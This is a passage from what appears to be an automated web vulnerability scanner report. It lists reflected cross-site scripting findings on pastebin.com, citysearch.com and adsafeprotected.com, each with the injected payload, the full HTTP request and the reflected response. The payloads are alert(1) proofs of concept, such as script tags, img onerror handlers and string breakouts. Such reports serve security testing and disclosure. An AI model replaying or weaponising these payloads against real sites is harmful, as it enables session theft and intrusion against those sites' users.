<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/CvGXyfiJ?aade4\"><script>alert(1)</script>5eef0908687=1"/>
...[SNIP]...

3.269. http://pastebin.com/DBDqm6Km [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /DBDqm6Km

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78747"><script>alert(1)</script>13324821e99 was submitted in the REST URL parameter 1. This input was echoed as 78747\"><script>alert(1)</script>13324821e99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DBDqm6Km78747"><script>alert(1)</script>13324821e99 HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:27 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:27 GMT; path=/; domain=.pastebin.com
Content-Length: 11321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/DBDqm6Km78747\"><script>alert(1)</script>13324821e99"/>
...[SNIP]...

3.270. http://pastebin.com/DBDqm6Km [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /DBDqm6Km

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7d31"><script>alert(1)</script>4d54ae0ed58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a7d31\"><script>alert(1)</script>4d54ae0ed58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /DBDqm6Km?a7d31"><script>alert(1)</script>4d54ae0ed58=1 HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:26 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:26 GMT; path=/; domain=.pastebin.com
Content-Length: 11330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/DBDqm6Km?a7d31\"><script>alert(1)</script>4d54ae0ed58=1"/>
...[SNIP]...

3.271. http://pastebin.com/X8znzPWH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /X8znzPWH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f06bd"><script>alert(1)</script>a97465dbc53 was submitted in the REST URL parameter 1. This input was echoed as f06bd\"><script>alert(1)</script>a97465dbc53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /X8znzPWHf06bd"><script>alert(1)</script>a97465dbc53 HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:28 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:28 GMT; path=/; domain=.pastebin.com
Content-Length: 11318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/X8znzPWHf06bd\"><script>alert(1)</script>a97465dbc53"/>
...[SNIP]...

3.272. http://pastebin.com/X8znzPWH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /X8znzPWH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9ebb"><script>alert(1)</script>ccd34ed679c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9ebb\"><script>alert(1)</script>ccd34ed679c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /X8znzPWH?f9ebb"><script>alert(1)</script>ccd34ed679c=1 HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:27 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:27 GMT; path=/; domain=.pastebin.com
Content-Length: 11352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/X8znzPWH?f9ebb\"><script>alert(1)</script>ccd34ed679c=1"/>
...[SNIP]...

3.273. http://pastebin.com/u/ComodoHacker [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /u/ComodoHacker

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f518"><script>alert(1)</script>94a013f3381 was submitted in the REST URL parameter 1. This input was echoed as 2f518\"><script>alert(1)</script>94a013f3381 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /u2f518"><script>alert(1)</script>94a013f3381/ComodoHacker HTTP/1.1
Host: pastebin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Tue, 19 Apr 2011 19:43:28 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=1; expires=Tue, 17-May-2011 19:43:28 GMT; path=/; domain=.pastebin.com
Content-Length: 11336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/u2f518\"><script>alert(1)</script>94a013f3381/ComodoHacker"/>
...[SNIP]...

3.274. http://pittsburgh.citysearch.com/guide/bloomfield-pittsburgh-pa/x26amp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pittsburgh.citysearch.com
Path:   /guide/bloomfield-pittsburgh-pa/x26amp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c597d"><script>alert(1)</script>4cc4b11b365 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guide/bloomfield-pittsburgh-pa/x26amp?c597d"><script>alert(1)</script>4cc4b11b365=1 HTTP/1.1
Host: pittsburgh.citysearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:13:25 GMT
Server: Apache-Coyote/1.1
Set-Cookie: abtest=a; path=/; domain=.citysearch.com; expires=Sat, 12-Mar-2011 02:13:25 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: usrid=feb174af85881661ed80d4e9b52fb930eae49637; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:26 GMT; Path=/
Set-Cookie: cs_session=79ca58bbce2565babfd57e2d990c594c8237bdf5; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:26 GMT; Path=/
Set-Cookie: publisher=citysearch; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:26 GMT; Path=/
Set-Cookie: reqseq=1; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:26 GMT; Path=/
Set-Cookie: recent_geos=8667%7E%7CBloomfield; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:26 GMT; Path=/
Set-Cookie: tseg=444; Domain=.citysearch.com; Expires=Fri, 27-May-2011 02:13:26 GMT; Path=/
Set-Cookie: userSearchLoc=Bloomfield%20%28Pittsburgh%2C%20PA%29%7E%7C8667; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:26 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 58675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!--[if IE]><![endif]--><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<link rel="canonical" href="http://pittsburgh.citysearch.com/guide/bloomfield-pittsburgh-pa/x26amp?c597d"><script>alert(1)</script>4cc4b11b365=1" />
...[SNIP]...

3.275. http://pittsburgh.citysearch.com/guide/pittsburgh-pa/x26amp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pittsburgh.citysearch.com
Path:   /guide/pittsburgh-pa/x26amp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21a0f"><script>alert(1)</script>9c07a67884d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guide/pittsburgh-pa/x26amp?21a0f"><script>alert(1)</script>9c07a67884d=1 HTTP/1.1
Host: pittsburgh.citysearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:13:13 GMT
Server: Apache-Coyote/1.1
Set-Cookie: abtest=a; path=/; domain=.citysearch.com; expires=Sat, 12-Mar-2011 02:13:13 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: usrid=d69fa7e554d0a10a718d2fe695adaccc8bba1c28; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:13 GMT; Path=/
Set-Cookie: cs_session=60da67a061bc6b32e8cc34ec0bc8d299827a70c5; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:13 GMT; Path=/
Set-Cookie: publisher=citysearch; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:13 GMT; Path=/
Set-Cookie: reqseq=1; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:13 GMT; Path=/
Set-Cookie: recent_geos=69794%7E%7CPittsburgh; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:13 GMT; Path=/
Set-Cookie: tseg=848; Domain=.citysearch.com; Expires=Fri, 27-May-2011 02:13:13 GMT; Path=/
Set-Cookie: userSearchLoc=Pittsburgh%2C%20PA%7E%7C69794; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:13 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 64496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!--[if IE]><![endif]--><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<link rel="canonical" href="http://pittsburgh.citysearch.com/guide/pittsburgh-pa/x26amp?21a0f"><script>alert(1)</script>9c07a67884d=1" />
...[SNIP]...

3.276. http://pittsburgh.citysearch.com/listings/bloomfield/musical_instruments/8667_3948 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pittsburgh.citysearch.com
Path:   /listings/bloomfield/musical_instruments/8667_3948

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a46c"><img%20src%3da%20onerror%3dalert(1)>da470ffd4e0 was submitted in the REST URL parameter 2. This input was echoed as 6a46c"><img src=a onerror=alert(1)>da470ffd4e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /listings/bloomfield6a46c"><img%20src%3da%20onerror%3dalert(1)>da470ffd4e0/musical_instruments/8667_3948 HTTP/1.1
Host: pittsburgh.citysearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:13:38 GMT
Server: Apache-Coyote/1.1
Set-Cookie: abtest=a; path=/; domain=.citysearch.com; expires=Sat, 12-Mar-2011 02:13:38 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: usrid=eab5605139476f5ffbfe6499a3d40ec9ea63650a; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:38 GMT; Path=/
Set-Cookie: cs_session=2d7b669341af42bf0f7a290aa6b816f2be48fb13; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:38 GMT; Path=/
Set-Cookie: publisher=citysearch; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:38 GMT; Path=/
Set-Cookie: reqseq=1; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:38 GMT; Path=/
Set-Cookie: recent_geos=8667%7E%7CBloomfield; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:38 GMT; Path=/
Set-Cookie: tseg=71; Domain=.citysearch.com; Expires=Fri, 27-May-2011 02:13:38 GMT; Path=/
Set-Cookie: userSearchLoc=Bloomfield%20%28Pittsburgh%2C%20PA%29%7E%7C8667; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:38 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 65014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!--[if IE]><![endif]--><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<input name="where" id="filter:where" type="hidden" value="bloomfield6a46c"><img src=a onerror=alert(1)>da470ffd4e0" />
...[SNIP]...

3.277. http://pittsburgh.citysearch.com/listings/bloomfield/musical_instruments/8667_3948 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pittsburgh.citysearch.com
Path:   /listings/bloomfield/musical_instruments/8667_3948

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac61d"><img%20src%3da%20onerror%3dalert(1)>cacbbb22cec was submitted in the REST URL parameter 3. This input was echoed as ac61d"><img src=a onerror=alert(1)>cacbbb22cec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /listings/bloomfield/musical_instrumentsac61d"><img%20src%3da%20onerror%3dalert(1)>cacbbb22cec/8667_3948 HTTP/1.1
Host: pittsburgh.citysearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:13:51 GMT
Server: Apache-Coyote/1.1
Set-Cookie: abtest=a; path=/; domain=.citysearch.com; expires=Sat, 12-Mar-2011 02:13:51 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: usrid=f5ff0092c0269684beef07934aaa870c1c9371c2; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:51 GMT; Path=/
Set-Cookie: cs_session=b0c0593abce4beb60e5b4d88bead462f5d5a680c; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:51 GMT; Path=/
Set-Cookie: publisher=citysearch; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:51 GMT; Path=/
Set-Cookie: reqseq=1; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:43:51 GMT; Path=/
Set-Cookie: recent_geos=8667%7E%7CBloomfield; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:51 GMT; Path=/
Set-Cookie: tseg=823; Domain=.citysearch.com; Expires=Fri, 27-May-2011 02:13:51 GMT; Path=/
Set-Cookie: userSearchLoc=Bloomfield%20%28Pittsburgh%2C%20PA%29%7E%7C8667; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:13:51 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 57597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!--[if IE]><![endif]--><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<input name="tagName" id="filter:tagName" type="hidden" value="musical_instrumentsac61d"><img src=a onerror=alert(1)>cacbbb22cec" />
...[SNIP]...

3.278. http://pittsburgh.citysearch.com/listings/bloomfield/musical_instruments/8667_3948/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pittsburgh.citysearch.com
Path:   /listings/bloomfield/musical_instruments/8667_3948/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf296"><script>alert(1)</script>915b0164ca9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /listings/bloomfield/musical_instruments/8667_3948/x22?cf296"><script>alert(1)</script>915b0164ca9=1 HTTP/1.1
Host: pittsburgh.citysearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /listings/bloomfield/musical_instruments/8667_3948/x22
Date: Sat, 26 Feb 2011 02:12:58 GMT
Server: Apache-Coyote/1.1
Set-Cookie: abtest=a; path=/; domain=.citysearch.com; expires=Sat, 12-Mar-2011 02:12:58 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Set-Cookie: usrid=60b9ad0426bf6582b94ea75a479ea44d9be383ce; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:12:58 GMT; Path=/
Set-Cookie: cs_session=d11a5e0f1728cb13879eba43ec96db5dabdc99f7; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:42:58 GMT; Path=/
Set-Cookie: publisher=citysearch; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:42:58 GMT; Path=/
Set-Cookie: reqseq=1; Domain=.citysearch.com; Expires=Sat, 26-Feb-2011 02:42:58 GMT; Path=/
Set-Cookie: recent_geos=71473%7E%7CDallas; Domain=.citysearch.com; Expires=Sun, 26-Feb-2012 02:12:58 GMT; Path=/
Set-Cookie: tseg=387; Domain=.citysearch.com; Expires=Fri, 27-May-2011 02:12:58 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 17810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!--[if IE]><![endif]--><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<link rel="canonical" href="http://pittsburgh.citysearch.com/listings/bloomfield/musical_instruments/8667_3948/x22?cf296"><script>alert(1)</script>915b0164ca9=1" />
...[SNIP]...

3.279. http://pixel.adsafeprotected.com/jspix [advId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the advId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a727c"-alert(1)-"0a1ceb9fb9d was submitted in the advId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=134&advId=2356384a727c"-alert(1)-"0a1ceb9fb9d&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:09 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CC3AB6842D7B651D85CA7B6C4E1FC931; Path=/
Connection: keep-alive
Content-Length: 8641


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x
...[SNIP]...
.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384a727c"-alert(1)-"0a1ceb9fb9d&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"di
...[SNIP]...

3.280. http://pixel.adsafeprotected.com/jspix [anId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17607"-alert(1)-"736181fd054 was submitted in the anId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=13417607"-alert(1)-"736181fd054&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:09 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A51403344CE6616473144CCAD1E6CB41; Path=/
Connection: keep-alive
Content-Length: 8641


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x
...[SNIP]...
os_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=13417607"-alert(1)-"736181fd054&advId=2356384&campId=5396397&chanId=239414132&placementId=62214207&pubId=1036126",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG
...[SNIP]...

3.281. http://pixel.adsafeprotected.com/jspix [campId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41148"-alert(1)-"97cd6e245a9 was submitted in the campId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=134&advId=2356384&campId=539639741148"-alert(1)-"97cd6e245a9&chanId=239414132&placementId=62214207&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x90/jx/ss/a/L26/1959749775/Top1/USNetwork/BCN2011030303_003_Dominos/dominos_cpc_apr_728.html/72634857383032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Tue, 19 Apr 2011 20:03:09 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=134E3C18FDC2B7E1829554984D119392; Path=/
Connection: keep-alive
Content-Length: 8641


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5396397.33;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/msnmtvn/ros/728x
...[SNIP]...
83032743533414141307447?;pc=OAS_dominos_cpc_apr_728;ord=1959749775?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=539639741148"-alert(1)-"97cd6e245a9&chanId=239414132&placementId=62214207&pubId=1036126",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=funct
...[SNIP]...

3.282. http://pixel.adsafeprotected.com/jspix [chanId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the chanId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d9e"-alert(1)-"bdc978586f7 was submitted in the chanId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=134&advId=2356384&campId=5396397&chanId=239414132b7d9e"-alert(1)-"bdc978586f7&placementId=62214207&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
